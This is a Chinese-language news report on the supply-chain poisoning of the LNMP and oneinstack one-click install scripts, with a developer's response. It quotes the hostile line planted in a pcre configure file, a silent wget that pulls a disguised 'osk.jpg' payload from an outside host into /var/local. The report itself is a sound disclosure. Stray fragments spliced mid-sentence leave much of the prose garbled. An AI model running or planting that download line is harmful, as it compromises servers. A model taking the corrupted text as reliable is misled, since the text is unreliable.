9 月下旬，繼L建議腳本國內安全公司發現知名 Web 集成環境安裝腳本 “lnmp 一鍵安裝包” 被投毒，后后門開發者、也被用戶用類站長、添加企業 IT 管理員下載的程序一鍵安裝包被加了后門程序。

當時我們都以為這是不使 LNMP 一鍵安裝包的服務器被黑了 (LNMP.org)，不過后來有網友發現 LNMP 一鍵安裝包已經被金華市矜貴網絡科技有限公司 (下稱金華矜貴) 收購。藍點

而關于安裝包被投毒問題金華矜貴沒有發布任何聲明，繼L建議腳本LNMP 論壇的后后門發帖也遭到管理員刪除。

現在來看這并不是也被用戶用類服務器被黑了，因為被金華矜貴收購的添加另一個集成環境安裝腳本 oneinstack 也被發現投毒，所以情況很明了了：那就是程序根本不是服務器被黑，而是不使他們自己在腳本里插入了惡意代碼，用來下載某些惡意軟件，藍點進而可以控制大量網站或服務器，繼L建議腳本但具體目的尚不清楚。

目前在 GitHub 和 V2EX 上已經有帖子在討論這件事，鑒于金華矜貴還試圖收購秋水逸冰的 lamp.sh 一鍵安裝包 (但被秋大拒絕了)，他們后續可能還會盯上其他一鍵安裝包，因此建議大家不要再使用這類一鍵安裝包，否則自己的網站或服務器可能也會變成肉雞。

更新：oneinstack 開發者回應稱：金華市矜貴網絡科技有限公司收購現有的幾個面板以及安裝包主要是為了布局類似寶塔的產品。想依賴 oneinstack 打開知名度。公司作為項目的投資商。協商的協議為公司為項目提供開發資金，并提供所有服務器資源。但是項目的管理權限以及運維權限都在我手中。目前各位開發者的精力主要是進行新的面板開發，對于出現本次被掛馬事故主要原因在于我們沒有對項目進行及時的管理。后續會加強安全措施。杜絕該問題的出現。

惡意代碼藏在圖片里：

pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

詳細請看 GitHub 討論：https://github.com/oneinstack/oneinstack/issues/511

(責任編輯：綜合)